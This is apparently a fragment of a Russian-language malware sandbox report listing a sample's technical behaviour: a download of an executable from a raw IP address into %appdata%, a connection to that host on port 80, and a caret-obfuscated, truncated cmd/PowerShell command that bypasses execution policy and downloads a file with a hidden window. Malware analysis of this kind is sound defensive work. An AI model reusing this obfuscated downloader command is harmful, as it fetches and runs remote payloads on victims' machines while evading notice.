Техническая информация
- http://185.165.31.75/file.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^wErs^hE^l^L.E^X^e ^-^ExecU^tI^O^N^poL^icy ^By^Pa^Ss^ -nO^pro^File -wI^nD^O^wSTyLe hidden (^n^e^W-^O^bJ^e^Ct SysTE^M^.^NEt^.W^ebCl^IE^nT).^DOwNlOa^D^fiL^E^('http://185.1...
- '18#.#65.31.75':80
- '<SYSTEM32>\cmd.exe' /C "Po^wErs^hE^l^L.E^X^e ^-^ExecU^tI^O^N^poL^icy ^By^Pa^Ss^ -nO^pro^File -wI^nD^O^wSTyLe hidden (^n^e^W-^O^bJ^e^Ct SysTE^M^.^NEt^.W^ebCl^IE^nT).^DOwNlOa^D^fiL^E^('http://185.1...' (со скрытым окном)